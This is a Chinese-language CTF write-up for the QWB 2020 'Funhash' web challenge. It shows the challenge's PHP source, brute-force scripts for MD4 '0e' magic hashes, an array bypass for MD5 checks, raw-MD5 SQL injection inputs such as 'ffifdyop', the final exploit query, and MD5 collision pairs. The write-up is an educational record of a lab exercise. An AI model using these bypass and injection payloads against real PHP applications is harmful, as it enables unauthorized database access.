强网杯 2020 Writeup | iluem'Blog

强网杯 2020 Writeup

发布 : 2020-08-23 分类 : Web 浏览 :

Web

Funhash

这题不是什么新知识,谷歌一下都能搜到,主要记录一下方便可能用到时查找。

<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
    die('level 1 failed');
}

//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
    die('level 2 failed');
}

//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();

?>

level1应该出自国外的一个比赛HSCTF 6 CTF

爆破脚本如下

<?php 
for($i=1,$i<1000000000;$i++;){
    if('0e'.$i == hash("md4", '0e'.$i))
    {
        print_r('Get it : 0e'.$i);
        break;
    }
    if($i%1000000==0)
        echo '.';
}
爆出0e开头的即成功,第一个是0e251288019,第二个是0e688801293

大佬的脚本

import hashlib
import Crypto.Hash.MD4
import re
prefix = '0e'
def breakit():
    iters = 0
    while 1:
        s  = (prefix + str(iters)).encode('utf-8')
        hashed_s = hashlib.new('md4', s).hexdigest()
        iters = iters + 1
        r = re.match('^0e[0-9]{30}', hashed_s)
        if r:
            print ("[+] found! md4( {} ) ---> {}".format(s, hashed_s))
            print ("[+] in {} iterations".format(iters))
            exit(0)
        if iters % 1000000 == 0:
            print ("[+] current value: {}       {} iterations, continue...".format(s, iters))
breakit()

level2应该已经做烂了,数组绕过即可。

level3这题也已经早在2010年就出过了,

img

爆破脚本如下

<?php 
for ($i = 0;;) { 
 for ($c = 0; $c < 1000000; $c++, $i++)
  if (stripos(md5($i, true), '\'or\'') !== false)
   echo "\nmd5($i) = " . md5($i, true) . "\n";
 echo ".";
}
?>

记录两个可用的值

content: 129581926211651571912466741651878684928
hex: 06da5430449f8f6f23dfc1276f722738
raw: \x06\xdaT0D\x9f\x8fo#\xdf\xc1'or'8
string: T0Do#'or'8

content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b

最终payload

?hash1=0e688801293&hash2[]=1&hash3[]=&hash4=129581926211651571912466741651878684928

此外,再记录一下md5强碰撞的值

image-20200825005222281

对于这种类型的检测,就不能使用数组绕过了,因为数组经过string强制转换后就会变成字符Array

php > var_dump((string)([]));
string(5) "Array"

贴上几个可用的值

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

a=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C/%CA%B5%87%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25qAZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BD%F2%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E2%B4%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%A8%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%2Bo%F7%2Ap&b=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C/%CA%B5%07%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25%F1AZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BDr%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E24%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%28%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%ABo%F7%2Ap

a=%3C%3Fphp%0A%0A%24space%20%3D%20%22AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%22%3B%0Aif%20%28%27%FDG.%05%C9%ED%14%EE-%17%29%19%98%EE%D0%FF%F2%AA%01%01%2B%D3B%A9%1B%D68%85%EC%15%B2%E1A%BD%C6%C7P%AD%3B%22%8F%FEP%1B%C8%F9ZU%9C5%85%24q%024F%DF1%17c%D0-%C5%8FC%FFS%0A%D4%3Bcr%FB%21%9D%9A%1F%DE%5B%F6%0DP3%C8%95%CCJ%0D%02%E9e%D7MIM%FE%B5%BF%7E%F2%8F2%EC%85%3A%A8%5Db%91%F0%B2%5C%F6%8C/5%95%BF%C3%1C%5E%DBgn%7E3D7%27%20%3D%3D%20%27%FDG.%05%C9%ED%14%EE-%17%29%19%98%EE%D0%FF%F2%AA%01%01%2B%D3B%A9%1B%D68%85%EC%15%B2%E1A%BD%C6%C7P%AD%3B%22%8F%FEP%1B%C8%F9ZU%9C5%85%24q%024F%DF1%17c%D0-%C5%8FC%FFS%0A%D4%3Bcr%FB%21%9D%9A%1F%DE%5B%F6%0DP3%C8%95%CCJ%0D%02%E9e%D7MIM%FE%B5%BF%7E%F2%8F2%EC%85%3A%A8%5Db%91%F0%B2%5C%F6%8C/5%95%BF%C3%1C%5E%DBgn%7E3D7%27%20%29%20%7B%0A%20%20%20%20echo%20%27Behaviour%20A%27%2CPHP_EOL%3B%0A%7D%20else%20%7B%0A%20%20%20%20echo%20%27Behaviour%20B%27%2CPHP_EOL%3B%0A%7D&b=%3C%3Fphp%0A%0A%24space%20%3D%20%22AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%22%3B%0Aif%20%28%27%FDG.%05%C9%ED%14%EE-%17%29%19%98%EE%D0%FF%F2%AA%01%81%2B%D3B%A9%1B%D68%85%EC%15%B2%E1A%BD%C6%C7P%AD%3B%22%8F%FEP%1B%C8y%5BU%9C5%85%24q%024F%DF1%17%E3%D0-%C5%8FC%FFS%0A%D4%3Bcr%FB%21%9D%9A%1F%DE%5B%F6%0DP3H%95%CCJ%0D%02%E9e%D7MIM%FE%B5%BF%7E%F2%8F2%EC%85%3A%A8%5Db%91p%B2%5C%F6%8C/5%95%BF%C3%1C%5E%DBg%EE%7E3D7%27%20%3D%3D%20%27%FDG.%05%C9%ED%14%EE-%17%29%19%98%EE%D0%FF%F2%AA%01%01%2B%D3B%A9%1B%D68%85%EC%15%B2%E1A%BD%C6%C7P%AD%3B%22%8F%FEP%1B%C8%F9ZU%9C5%85%24q%024F%DF1%17c%D0-%C5%8FC%FFS%0A%D4%3Bcr%FB%21%9D%9A%1F%DE%5B%F6%0DP3%C8%95%CCJ%0D%02%E9e%D7MIM%FE%B5%BF%7E%F2%8F2%EC%85%3A%A8%5Db%91%F0%B2%5C%F6%8C/5%95%BF%C3%1C%5E%DBgn%7E3D7%27%20%29%20%7B%0A%20%20%20%20echo%20%27Behaviour%20A%27%2CPHP_EOL%3B%0A%7D%20else%20%7B%0A%20%20%20%20echo%20%27Behaviour%20B%27%2CPHP_EOL%3B%0A%7D
留下足迹